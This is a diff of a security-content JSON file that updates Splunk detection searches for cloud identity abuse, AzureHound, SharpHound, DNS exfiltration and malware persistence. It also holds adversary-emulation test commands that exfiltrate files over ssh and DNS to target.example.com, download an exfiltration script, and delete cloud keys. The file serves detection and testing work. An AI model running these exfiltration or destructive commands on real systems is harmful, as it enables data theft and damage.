rename initiatedBy.user.userPrincipalName as initiatedBy | rename targetResources{}.type as type | stats values(userPrincipalName) as userPrincipalName by _time, type, initiatedBy, result, operationName | `azure_ad_external_guest_user_invited_filter`", "tags": { "name": "Azure AD External Guest User Invited", "analytic_story": [ @@ -473738,7 +479315,7 @@ { "name": "Azure AD Service Principal Created", "description": "The following analytic identifies the creation of a Service Principal in an Azure AD environment. An Azure Service Principal is an identity designed to be used with applications, services, and automated tools to access resources. It is similar to a service account within an Active Directory environment. Service Principal authentication does not support multi-factor authentication nor conditional access policies. Adversaries and red teams alike who have obtained administrative access may create a Service Principal to establish Persistence and obtain single-factor access to an Azure AD environment.", - "search": "`azuread` \"body.operationName\"=\"Add service principal\" \"body.properties.initiatedBy.user.id\"=* | rename body.properties.* as * | rename targetResources{}.displayName as displayName | rename initiatedBy.user.userPrincipalName as initiatedBy | rename targetResources{}.type as type | stats values(displayName) by _time, type, initiatedBy, result, body.operationName | `azure_ad_service_principal_created_filter`", + "search": "`azuread` operationName=\"Add service principal\" properties.initiatedBy.user.id=* | rename properties.* as * | rename targetResources{}.displayName as displayName | rename initiatedBy.user.userPrincipalName as initiatedBy | rename targetResources{}.type as type | stats values(displayName) as displayName by _time, type, initiatedBy, result, operationName | `azure_ad_service_principal_created_filter`", "tags": { "name": "Azure AD Service Principal Created", "analytic_story": [ @@ -473955,14 +479532,7 @@ ], "observable": [ { - "name": "ActorIpAddress", - "type": "IP Address", - "role": [ - "Attacker" - ] - }, - { - "name": "Actor.ID", + "name": "UserId", "type": "User", "role": [ "Attacker" @@ -474006,8 +479576,8 @@ }, { "name": "O365 Added Service Principal", - "description": "This search detects the creation of a new Federation setting by alerting about an specific event related to its creation.", - "search": "`o365_management_activity` Workload=AzureActiveDirectory Operation=\"Add service principal credentials.\" | stats min(_time) as firstTime max(_time) as lastTime values(Actor{}.ID) as Actor.ID values(ModifiedProperties{}.Name) as ModifiedProperties.Name values(ModifiedProperties{}.NewValue) as ModifiedProperties.NewValue values(Target{}.ID) as Target.ID by ActorIpAddress Operation | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `o365_added_service_principal_filter`", + "description": "The following analytic detects addition of new service principal accounts added to O365 tenants. Attackers can abuse service principals in Office 365 (now known as Microsoft 365) to gain unauthorized access and perform malicious actions within an organization's environment. Service principals are essentially non-human accounts used by applications, services, or scripts to access resources and interact with APIs on behalf of the organization.", + "search": "`o365_management_activity` Workload=AzureActiveDirectory Operation=\"*Add service principal*\" OR (Operation = \"*principal*\" AND action = \"created\") | stats count values(ModifiedProperties{}.NewValue) as new_value by src_user src_user_type action Operation authentication_service Workload | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_added_service_principal_filter`", "tags": { "name": "O365 Added Service Principal", "analytic_story": [ @@ -474021,7 +479591,7 @@ "kill_chain_phases": [ "Installation" ], - "message": "User $Actor.ID$ created a new federation setting on $Target.ID$ and added service principal credentials from IP Address $ActorIpAddress$", + "message": "User $src_user$ has created new service principal $new_value$ in AzureActiveDirectory", "mitre_attack_id": [ "T1136.003", "T1136" @@ -474031,15 +479601,8 @@ ], "observable": [ { - "name": "ActorIpAddress", - "type": "IP Address", - "role": [ - "Attacker" - ] - }, - { - "name": "Target.ID", - "type": "Endpoint", + "name": "src_user", + "type": "User", "role": [ "Victim" ] @@ -474075,8 +479638,8 @@ }, { "name": "O365 New Federated Domain Added", - "description": "This search detects the addition of a new Federated domain.", - "search": "`o365_management_activity` Workload=Exchange Operation=\"Add-FederatedDomain\" | stats count min(_time) as firstTime max(_time) as lastTime values(Parameters{}.Value) as Parameters.Value by ObjectId Operation OrganizationName OriginatingServer UserId UserKey | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_new_federated_domain_added_filter`", + "description": "The following search detects the addition of a new Federated domain in O365 environments. If an attacker adds an unverified domain to Office 365, they may gain unauthorized access to the organization's email and other services, potentially leading to data breaches and information theft. It can be misused to set up adversary infrastruture for phishing, spoofing emails and malware distribution.", + "search": "`o365_management_activity` Operation IN (\"*add*\", \"*new*\") AND Operation=\"*domain*\" | stats count values(ModifiedProperties{}.NewValue) as new_value by user user_agent authentication_service action Workload Operation | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_new_federated_domain_added_filter`", "tags": { "name": "O365 New Federated Domain Added", "analytic_story": [ @@ -474090,7 +479653,7 @@ "kill_chain_phases": [ "Installation" ], - "message": "User $UserId$ has added a new federated domaain $Parameters.Value$ for $OrganizationName$", + "message": "User $user$ has added a new federated domain $new_value$", "mitre_attack_id": [ "T1136.003", "T1136" @@ -474100,14 +479663,7 @@ ], "observable": [ { - "name": "OrganizationName", - "type": "Other", - "role": [ - "Victim" - ] - }, - { - "name": "UserId", + "name": "user", "type": "User", "role": [ "Victim" @@ -474561,7 +480117,7 @@ { "name": "Detect AzureHound Command-Line Arguments", "description": "The following analytic identifies the common command-line argument used by AzureHound `Invoke-AzureHound`. Being the script is FOSS, function names may be modified, but these changes are dependent upon the operator. In most instances the defaults are used. This analytic works to identify the common command-line attributes used. It does not cover the entirety of every argument in order to avoid false positives.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN (\"*invoke-azurehound*\") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_command_line_arguments_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN (\"*invoke-azurehound*\") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.parent_process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_command_line_arguments_filter`", "tags": { "name": "Detect AzureHound Command-Line Arguments", "analytic_story": [ @@ -474733,7 +480289,7 @@ { "name": "Detect AzureHound File Modifications", "description": "The following analytic is similar to SharpHound file modifications, but this instance covers the use of Invoke-AzureHound. AzureHound is the SharpHound equivilent but for Azure. It's possible this may never be seen in an environment as most attackers may execute this tool remotely. Once execution is complete, a zip file with a similar name will drop `20210601090751-azurecollection.zip`. In addition to the zip, multiple .json files will be written to disk, which are in the zip.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN (\"*-azurecollection.zip\", \"*-azprivroleadminrights.json\", \"*-azglobaladminrights.json\", \"*-azcloudappadmins.json\", \"*-azapplicationadmins.json\") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_file_modifications_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN (\"*-azurecollection.zip\", \"*-azprivroleadminrights.json\", \"*-azglobaladminrights.json\", \"*-azcloudappadmins.json\", \"*-azapplicationadmins.json\") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.user | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_file_modifications_filter`", "tags": { "name": "Detect AzureHound File Modifications", "analytic_story": [ @@ -475050,7 +480606,7 @@ { "name": "Detect SharpHound File Modifications", "description": "SharpHound is used as a reconnaissance collector, ingestor, for BloodHound. SharpHound will query the domain controller and begin gathering all the data related to the domain and trusts. For output, it will drop a .zip file upon completion following a typical pattern that is often not changed. This analytic focuses on the default file name scheme. Note that this may be evaded with different parameters within SharpHound, but that depends on the operator. `-randomizefilenames` and `-encryptzip` are two examples. In addition, executing SharpHound via .exe or .ps1 without any command-line arguments will still perform activity and dump output to the default filename. Example default filename `20210601181553_BloodHound.zip`. SharpHound creates multiple temp files following the same pattern `20210601182121_computers.json`, `domains.json`, `gpos.json`, `ous.json` and `users.json`. Tuning may be required, or remove these json's entirely if it is too noisy. During traige, review parallel processes for further suspicious behavior. Typically, the process executing the `.ps1` ingestor will be PowerShell.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN (\"*bloodhound.zip\", \"*_computers.json\", \"*_gpos.json\", \"*_domains.json\", \"*_users.json\", \"*_groups.json\", \"*_ous.json\", \"*_containers.json\") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_sharphound_file_modifications_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN (\"*bloodhound.zip\", \"*_computers.json\", \"*_gpos.json\", \"*_domains.json\", \"*_users.json\", \"*_groups.json\", \"*_ous.json\", \"*_containers.json\") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.user| `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_sharphound_file_modifications_filter`", "tags": { "name": "Detect SharpHound File Modifications", "analytic_story": [ @@ -475086,7 +480642,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -476830,7 +482386,7 @@ "name": "sh", "elevation_required": false, "command": "gcloud config set project #{project_id}\nKEY=`gcloud iam service-accounts keys list --iam-account=#{service_name}@#{project_id}.iam.gserviceaccount.com --format=\"value(KEY_ID)\" --limit=1`\ngcloud iam service-accounts keys delete $KEY --iam-account=#{service_name}@#{project_id}.iam.gserviceaccount.com --quiet\n", - "cleanup_command": "cd $PathToAtomicsFolder/T1098/src/T1098-17/\nterraform state rm google_service_account_key.key\nterraform destroy -auto-approve\n" + "cleanup_command": "cd \"$PathToAtomicsFolder/T1098/src/T1098-17/\"\nterraform state rm google_service_account_key.key\nterraform destroy -auto-approve\n" }, "dependency_executor_name": "sh", "dependencies": [ @@ -476851,8 +482407,8 @@ }, { "description": "Create dependency resources using terraform\n", - "prereq_command": "stat $PathToAtomicsFolder/T1098/src/T1098-17/terraform.tfstate\n", - "get_prereq_command": "cd $PathToAtomicsFolder/T1098/src/T1098-17/\nterraform init\nterraform apply -auto-approve" + "prereq_command": "stat \"$PathToAtomicsFolder/T1098/src/T1098-17/terraform.tfstate\"\n", + "get_prereq_command": "cd \"$PathToAtomicsFolder/T1098/src/T1098-17/\"\nterraform init\nterraform apply -auto-approve" } ] } @@ -477905,7 +483461,7 @@ { "name": "AWS IAM Delete Policy", "description": "The following detection identifes when a policy is deleted on AWS. This does not identify whether successful or failed, but the error messages tell a story of suspicious attempts. There is a specific process to follow when deleting a policy. First, detach the policy from all users, groups, and roles that the policy is attached to, using DetachUserPolicy , DetachGroupPolicy , or DetachRolePolicy.", - "search": "`cloudtrail` eventName=DeletePolicy (userAgent!=*.amazonaws.com) | stats count min(_time) as firstTime max(_time) as lastTime values(requestParameters.policyArn) as policyArn by src eventName eventSource aws_account_id errorCode errorMessage userAgent eventID awsRegion userIdentity.principalId userIdentity.arn | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_iam_delete_policy_filter`", + "search": "`cloudtrail` eventName=DeletePolicy (userAgent!=*.amazonaws.com) | stats count min(_time) as firstTime max(_time) as lastTime values(requestParameters.policyArn) as policyArn by src user_arn eventName eventSource aws_account_id errorCode errorMessage userAgent eventID awsRegion userIdentity.principalId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_iam_delete_policy_filter`", "tags": { "name": "AWS IAM Delete Policy", "analytic_story": [ @@ -478127,7 +483683,7 @@ { "name": "Azure AD Application Administrator Role Assigned", "description": "The following analytic identifies the assignment of the Application Administrator role to an Azure AD user. Users in this role can create and manage all aspects of enterprise applications, application registrations, and application proxy settings. This role also grants the ability to manage application credentials. Users assigned this role can add credentials to an application, and use those credentials to impersonate the applications identity. If the applications identity has been granted access to a resource, such as the ability to create or update User or other objects, then a user assigned to this role could perform those actions while impersonating the application. This ability to impersonate the applications identity may be an elevation of privilege over what the user can do via their role assignments. Red teams and adversaries alike may abuse this role to escalate their privileges in an Azure AD tenant.", - "search": " `azuread` \"body.operationName\"=\"Add member to role\" \"body.properties.targetResources{}.modifiedProperties{}.newValue\"=\"\\\"Application Administrator\\\"\" | rename body.properties.* as * | rename targetResources{}.userPrincipalName as userPrincipalName | rename initiatedBy.user.userPrincipalName as initiatedBy | stats values(userPrincipalName) by _time, initiatedBy, result, body.operationName | `azure_ad_application_administrator_role_assigned_filter`", + "search": " `azuread` \"operationName\"=\"Add member to role\" \"properties.targetResources{}.modifiedProperties{}.newValue\"=\"\\\"Application Administrator\\\"\" | rename properties.* as * | rename targetResources{}.userPrincipalName as userPrincipalName | rename initiatedBy.user.userPrincipalName as initiatedBy | stats values(userPrincipalName) as userPrincipalName by _time, initiatedBy, result, operationName | `azure_ad_application_administrator_role_assigned_filter`", "tags": { "name": "Azure AD Application Administrator Role Assigned", "analytic_story": [ @@ -478335,7 +483891,7 @@ { "name": "Azure AD Privileged Role Assigned", "description": "The following analytic identifies the assignment of sensitive and privileged Azure Active Directory roles to an Azure AD user. Adversaries and red teams alike may assign these roles to a compromised account to establish Persistence in an Azure AD environment.", - "search": " `azuread` \"body.operationName\"=\"Add member to role\" | rename body.properties.* as * | rename targetResources{}.userPrincipalName as userPrincipalName | rename initiatedBy.user.userPrincipalName as initiatedBy | rename targetResources{}.modifiedProperties{}.newValue as roles | eval role=mvindex(roles,1) | lookup privileged_azure_ad_roles azureadrole AS role OUTPUT isprvilegedadrole description | search isprvilegedadrole = True | stats values(userPrincipalName) by _time, initiatedBy, result, body.operationName, role, description | `azure_ad_privileged_role_assigned_filter`", + "search": " `azuread` \"operationName\"=\"Add member to role\" | rename properties.* as * | rename targetResources{}.userPrincipalName as userPrincipalName | rename initiatedBy.user.userPrincipalName as initiatedBy | rename targetResources{}.modifiedProperties{}.newValue as roles | eval role=mvindex(roles,1) | lookup privileged_azure_ad_roles azureadrole AS role OUTPUT isprvilegedadrole description | search isprvilegedadrole = True | stats values(userPrincipalName) as userPrincipalName by _time, initiatedBy, result, operationName, role, description | `azure_ad_privileged_role_assigned_filter`", "tags": { "name": "Azure AD Privileged Role Assigned", "analytic_story": [ @@ -478474,7 +484030,7 @@ { "name": "Azure AD Service Principal New Client Credentials", "description": "The following analytic identifies the addition of new credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD. These credentials include both x509 certificates and passwords. With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules. Adversaries and red teams alike who have obtained privileged access to Azure AD may add credentials to Service Principals to maintain persistent access to victim accounts and other instances within the Azure environment. By compromising an account who is an Owner of an application with privileged access, attackers may also escalate their privileges in an Azure AD environment by adding new credentials and logging in as the service principal.", - "search": " `azuread` body.category=AuditLogs body.operationName=\"Update application*Certificates and secrets management \" | rename body.* as * | rename properties.* as * | rename targetResources{}.* as * | stats values(displayName) by _time, initiatedBy.user.userPrincipalName, modifiedProperties{}.newValue | `azure_ad_service_principal_new_client_credentials_filter`", + "search": " `azuread` category=AuditLogs operationName=\"Update application*Certificates and secrets management \" | rename * as * | rename properties.* as * | rename targetResources{}.* as * | stats values(displayName) as displayName by _time, initiatedBy.user.userPrincipalName, modifiedProperties{}.newValue | `azure_ad_service_principal_new_client_credentials_filter`", "tags": { "name": "Azure AD Service Principal New Client Credentials", "analytic_story": [ @@ -478488,7 +484044,7 @@ "kill_chain_phases": [ "Installation" ], - "message": "New credentials added for Service Principal $body.properties.targetResources{}.displayName$", + "message": "New credentials added for Service Principal $properties.targetResources{}.displayName$", "mitre_attack_id": [ "T1098", "T1098.001" @@ -478546,7 +484102,7 @@ { "name": "Azure AD Service Principal Owner Added", "description": "The following analytic identifies the addition of a new owner for a Service Principal within an Azure AD tenant. An Azure Service Principal is an identity designed to be used with applications, services, and automated tools to access resources. It is similar to a service account within an Active Directory environment. Service Principal authentication does not support multi-factor authentication nor conditional access policies. Adversaries and red teams alike who have obtained administrative access may add a new owner for an existing Service Principal to establish Persistence and obtain single-factor access to an Azure AD environment. Attackers who are looking to escalate their privileges by leveraging a Service Principals permissions may also add a new owner.", - "search": " `azuread` body.operationName=\"Add owner to application\" | rename body.properties.* as * | rename initiatedBy.user.userPrincipalName as initiatedBy | rename targetResources{}.userPrincipalName as newOwner | rename targetResources{}.modifiedProperties{}.newValue as displayName | eval displayName = mvindex(displayName,1) | where initiatedBy!=newOwner | stats values(displayName) by _time, initiatedBy, result, body.operationName, newOwner | `azure_ad_service_principal_owner_added_filter`", + "search": " `azuread` operationName=\"Add owner to application\" | rename properties.* as * | rename initiatedBy.user.userPrincipalName as initiatedBy | rename targetResources{}.userPrincipalName as newOwner | rename targetResources{}.modifiedProperties{}.newValue as displayName | eval displayName = mvindex(displayName,1) | where initiatedBy!=newOwner | stats values(displayName) as displayName by _time, initiatedBy, result, operationName, newOwner | `azure_ad_service_principal_owner_added_filter`", "tags": { "name": "Azure AD Service Principal Owner Added", "analytic_story": [ @@ -478609,7 +484165,7 @@ { "name": "Azure AD User Enabled And Password Reset", "description": "The following analytic identifies an Azure AD user enabling a previously disabled account and resetting its password within 2 minutes. This behavior could represent an adversary who has obtained administrative access and is trying to establish a backdoor identity within an Azure AD tenant.", - "search": " `azuread` (body.operationName=\"Enable account\" OR body.operationName=\"Reset password (by admin)\" OR body.operationName=\"Update user\") | transaction body.properties.targetResources{}.userPrincipalName startsWith=(body.operationName=\"Enable account\") endsWith=(body.operationName=\"Reset password (by admin)\") maxspan=2m | rename body.properties.* as * | rename targetResources{}.userPrincipalName as userPrincipalName | rename initiatedBy.user.userPrincipalName as initiatedBy | stats values(body.operationName) values(initiatedBy) by _time, userPrincipalName, result | `azure_ad_user_enabled_and_password_reset_filter`", + "search": " `azuread` (operationName=\"Enable account\" OR operationName=\"Reset password (by admin)\" OR operationName=\"Update user\") | transaction properties.targetResources{}.userPrincipalName startsWith=(operationName=\"Enable account\") endsWith=(operationName=\"Reset password (by admin)\") maxspan=2m | rename properties.* as * | rename targetResources{}.userPrincipalName as userPrincipalName | rename initiatedBy.user.userPrincipalName as initiatedBy | stats values(operationName) values(initiatedBy) as initiatedBy by _time, userPrincipalName, result | `azure_ad_user_enabled_and_password_reset_filter`", "tags": { "name": "Azure AD User Enabled And Password Reset", "analytic_story": [ @@ -478622,7 +484178,7 @@ "kill_chain_phases": [ "Installation" ], - "message": "A user account, $displayName$, was enabled and its password reset within 2 minutes by $initiatedBy$", + "message": "A user account, $userPrincipalName$, was enabled and its password reset within 2 minutes by $initiatedBy$", "mitre_attack_id": [ "T1098" ], @@ -478631,15 +484187,15 @@ ], "observable": [ { - "name": "displayName", - "type": "Other", + "name": "userPrincipalName", + "type": "User Name", "role": [ "Victim" ] }, { "name": "initiatedBy", - "type": "User", + "type": "User Name", "role": [ "Attacker" ] @@ -478671,7 +484227,7 @@ { "name": "Azure AD User ImmutableId Attribute Updated", "description": "The following analytic identifies the modification of the SourceAnchor (also called ImmutableId) attribute for an Azure Active Directory user. Updating this attribute is a step required to set up the Azure Active Directory identity federation backdoor technique discovered by security researcher Nestori Syynimaa. Similar to Active Directory, Azure AD uses the concept of domains to manage directories of identities. A new Azure AD tenant will initially contain a single domain that is commonly called the `cloud-only` onmicrosoft.com domain. Organizations can also add their registered custom domains to Azure AD for email addresses to match the organizations domain name. If the organization intends to use a third-party identity provider such as ADFS for authentication, the added custom domains can be configured as federated. An adversary who has obtained privileged access to an Azure AD tenant may leverage this technique to establish persistence and be able to authenticate to Azure AD impersonating any user and bypassing the requirement to have a valid password and/or perform MFA.", - "search": " `azuread` body.operationName=\"Update user\" body.properties.targetResources{}.modifiedProperties{}.displayName=SourceAnchor | rename body.properties.* as * | rename targetResources{}.userPrincipalName as userPrincipalName | rename initiatedBy.user.userPrincipalName as initiatedBy | rename body.callerIpAddress as callerIpAddress | rename targetResources{}.modifiedProperties{}.newValue as modifiedProperties | stats values(userPrincipalName) values(modifiedProperties) by _time, initiatedBy, callerIpAddress, result, body.operationName | `azure_ad_user_immutableid_attribute_updated_filter`", + "search": " `azuread` operationName=\"Update user\" properties.targetResources{}.modifiedProperties{}.displayName=SourceAnchor | rename properties.* as * | rename targetResources{}.userPrincipalName as userPrincipalName | rename initiatedBy.user.userPrincipalName as initiatedBy | rename callerIpAddress as callerIpAddress | rename targetResources{}.modifiedProperties{}.newValue as modifiedProperties | stats values(userPrincipalName) as userPrincipalName values(modifiedProperties) by _time, initiatedBy, callerIpAddress, result, operationName | `azure_ad_user_immutableid_attribute_updated_filter`", "tags": { "name": "Azure AD User ImmutableId Attribute Updated", "analytic_story": [ @@ -479059,7 +484615,7 @@ { "name": "Windows AD Short Lived Domain Account ServicePrincipalName", "description": "The following analytic identifies the addition of a Service Principal Name to a domain account that is quickly deleted within 5 minutes or less. While this event may be part of a legitimate action part of certain administrative operations, it may also be evidence of a persistence attack. Domain accounts with Service Principal Names are vulnerable to a technique called Kerberoasting that enables attackers to potentially obtain the cleartext password of the account by performing offline cracking. An adversary who has obtained privileged access to a domain environment may add an SPN to a privileged account to then leverage the Kerberoasting technique and attempt to obtain its clertext password. To clean things up, the adversary may delete the SPN which will trigger this detection.", - "search": " `wineventlog_security` EventCode=5136 AttributeLDAPDisplayName=servicePrincipalName | transaction ObjectDN AttributeValue startswith=(EventCode=5136 OperationType=\"%%14674\") endswith=(EventCode=5136 OperationType=\"%%14675\") | eval short_lived=case((duration<300),\"TRUE\") | search short_lived = TRUE | `windows_ad_short_lived_domain_account_serviceprincipalname_filter`", + "search": " `wineventlog_security` EventCode=5136 AttributeLDAPDisplayName=servicePrincipalName | transaction ObjectDN AttributeValue startswith=(EventCode=5136 OperationType=\"%%14674\") endswith=(EventCode=5136 OperationType=\"%%14675\") | eval short_lived=case((duration<300),\"TRUE\") | search short_lived = TRUE | rename ObjectDN as user | `windows_ad_short_lived_domain_account_serviceprincipalname_filter`", "tags": { "name": "Windows AD Short Lived Domain Account ServicePrincipalName", "analytic_story": [ @@ -479072,7 +484628,7 @@ "kill_chain_phases": [ "Installation" ], - "message": "A Servince Principal Name for $ObjectDN$ was set and shortly deleted", + "message": "A Servince Principal Name for $user$ was set and shortly deleted", "mitre_attack_id": [ "T1098" ], @@ -479081,14 +484637,7 @@ ], "observable": [ { - "name": "SubjectUserName", - "type": "User", - "role": [ - "Attacker" - ] - }, - { - "name": "ObjectDN", + "name": "user", "type": "User", "role": [ "Victim" @@ -479842,7 +485391,7 @@ "command_list": [ "ssh target.example.com \"(cd /etc && tar -zcvf - *)\" > ./etc.tar.gz\n", "tar czpf - /Users/* | openssl des3 -salt -pass atomic | ssh atomic@target.example.com 'cat > /Users.tar.gz.enc'\n", - "Import-Module \\..\\ExternalPayloads\\dnsexfil.ps1\nInvoke-DNSExfiltrator -i \\..\\ExternalPayloads\\dnsexfil.ps1 -d target.example.com -p atomic -doh google -t 500 #{encoding}\n", + "Import-Module \"\\..\\ExternalPayloads\\dnsexfil.ps1\"\nInvoke-DNSExfiltrator -i \"\\..\\ExternalPayloads\\dnsexfil.ps1\" -d target.example.com -p atomic -doh google -t 500 #{encoding}\n", "powershell/exfiltration/exfil_dropbox", "exfiltration/Invoke_ExfilDataToGitHub" ], @@ -480060,12 +485609,12 @@ "dependencies": [ { "description": "DNSExfiltrator powershell file must exist on disk at specified location (#{ps_module})\n", - "prereq_command": "if (Test-Path #{ps_module}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nIWR \"https://raw.githubusercontent.com/Arno0x/DNSExfiltrator/8faa972408b0384416fffd5b4d42a7aa00526ca8/Invoke-DNSExfiltrator.ps1\" -OutFile #{ps_module}\n" + "prereq_command": "if (Test-Path \"#{ps_module}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nIWR \"https://raw.githubusercontent.com/Arno0x/DNSExfiltrator/8faa972408b0384416fffd5b4d42a7aa00526ca8/Invoke-DNSExfiltrator.ps1\" -OutFile \"#{ps_module}\"\n" } ], "executor": { - "command": "Import-Module #{ps_module}\nInvoke-DNSExfiltrator -i #{ps_module} -d #{domain} -p #{password} -doh #{doh} -t #{time} #{encoding}\n", + "command": "Import-Module \"#{ps_module}\"\nInvoke-DNSExfiltrator -i \"#{ps_module}\" -d #{domain} -p #{password} -doh #{doh} -t #{time} #{encoding}\n", "name": "powershell" } } @@ -482293,18 +487842,11 @@ ], "observable": [ { - "name": "source.address", - "type": "User", + "name": "dest_domain", + "type": "IP Address", "role": [ "Attacker" ] - }, - { - "name": "destination{}.address", - "type": "User", - "role": [ - "Victim" - ] } ], "risk_score": 9, @@ -482344,7 +487886,7 @@ { "name": "DNS Exfiltration Using Nslookup App", "description": "this search is to detect potential DNS exfiltration using nslookup application. This technique are seen in couple of malware and APT group to exfiltrated collected data in a infected machine or infected network. This detection is looking for unique use of nslookup where it tries to use specific record type, TXT, A, AAAA, that are commonly used by attacker and also the retry parameter which is designed to query C2 DNS multiple tries.", - "search": "| tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.process_id) as process_id values(Processes.parent_process) as parent_process count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = \"nslookup.exe\" Processes.process = \"*-querytype=*\" OR Processes.process=\"*-qt=*\" OR Processes.process=\"*-q=*\" OR Processes.process=\"-type=*\" OR Processes.process=\"*-retry=*\" by Processes.dest Processes.user Processes.process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `dns_exfiltration_using_nslookup_app_filter`", + "search": "| tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.process_id) as process_id values(Processes.parent_process) as parent_process count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = \"nslookup.exe\" Processes.process = \"*-querytype=*\" OR Processes.process=\"*-qt=*\" OR Processes.process=\"*-q=*\" OR Processes.process=\"-type=*\" OR Processes.process=\"*-retry=*\" by Processes.dest Processes.user Processes.process_name Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `dns_exfiltration_using_nslookup_app_filter`", "tags": { "name": "DNS Exfiltration Using Nslookup App", "analytic_story": [ @@ -483561,7 +489103,7 @@ { "name": "Windows Snake Malware Service Create", "description": "The following analytic identifies a new service WerFaultSvc being created with a binary path located in the windows winsxs path. Per the report, the Snake version primarily discussed in this advisory registers a service to maintain persistence on a system. Typically this service is named WerFaultSvc which we assess was used to blend in with the legitimate Windows service WerSvc. On boot, this service will execute Snakes WerFault.exe, which Snake developers chose to hide among the numerous valid Windows WerFault.exe files in the windows WinSxS directory. Executing WerFault.exe will start the process of decrypting Snakes components and loading them into memory.", - "search": "`wineventlog_system` EventCode=7045 ImagePath=\"*\\\\windows\\\\winSxS\\\\*\" ImagePath=\"*\\Werfault.exe\" | stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode ImagePath ServiceName ServiceType | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_snake_malware_service_create_filter`", + "search": "`wineventlog_system` EventCode=7045 ImagePath=\"*\\\\windows\\\\winSxS\\\\*\" ImagePath=\"*\\Werfault.exe\" | stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode ImagePath ServiceName ServiceType | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_snake_malware_service_create_filter`", "tags": { "name": "Windows Snake Malware Service Create", "analytic_story": [ @@ -484232,7 +489774,7 @@ ] }, { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" @@ -487251,7 +492793,7 @@ "kill_chain_phases": [ "Delivery" ], - "message": "tbd", + "message": "Gsuite suspicious calendar invite sent by $email$", "mitre_attack_id": [ "T1566" ], @@ -487260,10 +492802,10 @@ ], "observable": [ { - "name": "dest", - "type": "Other", + "name": "email", + "type": "Email Address", "role": [ - "Other" + "Attacker" ] } ], @@ -487764,7 +493306,8 @@ "analytic_story": [ "FIN7", "AgentTesla", - "CVE-2023-21716 Word RTF Heap Corruption" + "CVE-2023-21716 Word RTF Heap Corruption", + "Warzone RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -488161,7 +493704,7 @@ { "name": "Office Document Creating Schedule Task", "description": "this search detects a potential malicious office document that create schedule task entry through macro VBA api or through loading taskschd.dll. This technique was seen in so many malicious macro malware that create persistence , beaconing using task schedule malware entry The search will return the first time and last time the task was registered, as well as the `Command` to be executed, `Task Name`, `Author`, `Enabled`, and whether it is `Hidden` or not. schtasks.exe is natively found in `C:\\Windows\\system32` and `C:\\Windows\\syswow64`. The following DLL(s) are loaded when schtasks.exe or TaskService is launched -`taskschd.dll`. If found loaded by another process, it's possible a scheduled task is being registered within that process context in memory. Upon triage, identify the task scheduled source. Was it schtasks.exe or via TaskService? Review the job created and the Command to be executed. Capture any artifacts on disk and review. Identify any parallel processes within the same timeframe to identify source.'", - "search": "`sysmon` EventCode=7 parent_process_name IN (\"WINWORD.EXE\", \"EXCEL.EXE\", 